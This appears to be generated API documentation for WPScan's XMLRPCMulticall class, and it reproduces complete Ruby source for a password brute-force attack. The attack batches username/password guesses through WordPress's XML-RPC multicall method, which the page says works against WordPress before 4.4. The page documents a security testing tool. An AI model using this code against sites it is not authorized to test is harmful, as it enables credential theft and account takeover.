Class: WPScan::Finders::Passwords::XMLRPCMulticall

Inherits:
CMSScanner::Finders::Finder
  • Object
show all
Defined in:
app/finders/passwords/xml_rpc_multicall.rb

Overview

Password attack against the XMLRPC interface with the multicall method WP < 4.4 is vulnerable to such attack

Instance Method Summary collapse

Instance Method Details

#attack(users, passwords, opts = {}) {|Model::User| ... } ⇒ Object

TODO: Make rubocop happy about metrics etc

rubocop:disable all

Parameters:

  • users (Array<Model::User>)
  • passwords (Array<String>)
  • opts (Hash) (defaults to: {})

Options Hash (opts):

  • :show_progression (Boolean)
  • :multicall_max_passwords (Integer)

Yields:

  • (Model::User)

    When a valid combination is found



36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
 
# File 'app/finders/passwords/xml_rpc_multicall.rb', line 36

def attack(users, passwords, opts = {})
  wordlist_index         = 0
  max_passwords          = opts[:multicall_max_passwords]
  current_passwords_size = passwords_size(max_passwords, users.size)

  create_progress_bar(total: (passwords.size / current_passwords_size.round(1)).ceil,
                      show_progression: opts[:show_progression])

  loop do
    current_users     = users.select { |user| user.password.nil? }
    current_passwords = passwords[wordlist_index, current_passwords_size]
    wordlist_index   += current_passwords_size

    break if current_users.empty? || current_passwords.nil? || current_passwords.empty?

    res = do_multi_call(current_users, current_passwords)

    progress_bar.increment

    check_and_output_errors(res)

    # Avoid to parse the response and iterate over all the structs in the document
    # if there isn't any tag matching a valid combination
    next unless res.body =~ /isAdmin/ # maybe a better one ?

    Nokogiri::XML(res.body).xpath('//struct').each_with_index do |struct, index|
      next if struct.text =~ /faultCode/

      user = current_users[index / current_passwords.size]
      user.password = current_passwords[index % current_passwords.size]

      yield user

      # Updates the current_passwords_size and progress_bar#total
      # given that less requests will be done due to a valid combination found.
      current_passwords_size = passwords_size(max_passwords, current_users.size - 1)

      if current_passwords_size == 0
        progress_bar.log('All Found') # remove ?
        progress_bar.stop
        break
      end

      progress_bar.total = progress_bar.progress + ((passwords.size - wordlist_index) / current_passwords_size.round(1)).ceil
    end
  end
  # Maybe a progress_bar.stop ?
end

#check_and_output_errors(res) ⇒ Object

Parameters:



94
95
96
97
98
99
100
 
# File 'app/finders/passwords/xml_rpc_multicall.rb', line 94

def check_and_output_errors(res)
  progress_bar.log("Incorrect response: #{res.code} / #{res.return_message}") unless res.code == 200

  progress_bar.log('Parsing error, might be caused by a too high --max-passwords value (such as >= 2k)') if res.body =~ /parse error. not well formed/i

  progress_bar.log('The requested method is not supported') if res.body =~ /requested method [^ ]+ does not exist/i
end

#do_multi_call(users, passwords) ⇒ Typhoeus::Response

Parameters:

  • users (Array<User>)
  • passwords (Array<String>)

Returns:



13
14
15
16
17
18
19
20
21
22
23
 
# File 'app/finders/passwords/xml_rpc_multicall.rb', line 13

def do_multi_call(users, passwords)
  methods = []

  users.each do |user|
    passwords.each do |password|
      methods << ['wp.getUsersBlogs', user.username, password]
    end
  end

  target.multi_call(methods, cache_ttl: 0).run
end

#passwords_size(max_passwords, users_size) ⇒ Object

rubocop:disable all



86
87
88
89
90
91
 
# File 'app/finders/passwords/xml_rpc_multicall.rb', line 86

def passwords_size(max_passwords, users_size)
  return 1 if max_passwords < users_size
  return 0 if users_size == 0

  max_passwords / users_size
end